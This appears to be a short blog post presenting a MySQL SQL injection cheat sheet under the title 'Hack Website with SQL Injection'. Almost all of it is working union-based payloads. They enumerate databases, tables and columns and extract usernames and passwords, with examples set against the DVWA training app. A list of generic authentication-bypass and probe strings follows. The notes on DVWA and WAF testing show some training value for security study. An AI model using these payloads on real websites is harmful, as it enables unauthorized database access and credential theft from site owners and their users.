What is SQL Injection - Hack Website with SQL Injection

2021-04-29 18:43:30 - Adil Khan

 

 


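Basic Payload
(All payloads below use MySQL syntax and assume the vulnerable query returns two columns. They only work where the application concatenates user input into the SQL string; a parameterized query binds the same input as a plain value.)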
' union select 1,2 -- 

Get Database Name
' union select database(),2 -- 

Get Username
 ' union select user(),null -- 

Get Databases
' union select distinct table_schema, null from information_schema.tables-- 

Get Tables
' union select null, TABLE_NAME from information_schema.tables where table_schema='DATABASE_NAME'-- 
Example (DVWA, a deliberately vulnerable training application)
' union select null, TABLE_NAME from information_schema.tables where table_schema='dvwa'-- 

Get Columns
' union select null, COLUMN_NAME from information_schema.COLUMNS where table_schema='DATABASE_NAME' AND TABLE_NAME='TABLE_NAME'-- 
Example (DVWA users table)
' union select null, COLUMN_NAME from information_schema.COLUMNS where table_schema='dvwa' AND TABLE_NAME='users'-- 

Get Data from Table
' union select username, password from DATABASE_NAME.TABLE_NAME -- 
Example (DVWA users table)
' union select username, password from dvwa.users -- 


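Generic Payloads (probe strings that show how an input handles quotes, comment markers and boolean conditions; also usable as test cases for input handling and WAF/IDS signatures):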
'
"
''
`
``
,
""
/
//

\
;
' or "
-- or # 
' OR '1
' OR 1 -- -
" OR "" = "
" OR 1 = 1 -- -
' OR '' = '
'='
'LIKE'
'=0--+
 OR 1=1
' OR 'x'='x
' AND id IS NULL; --
'''''''''''''UNION SELECT '2
%00
/*…*/

SQL Injection Cheat Sheet
http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet
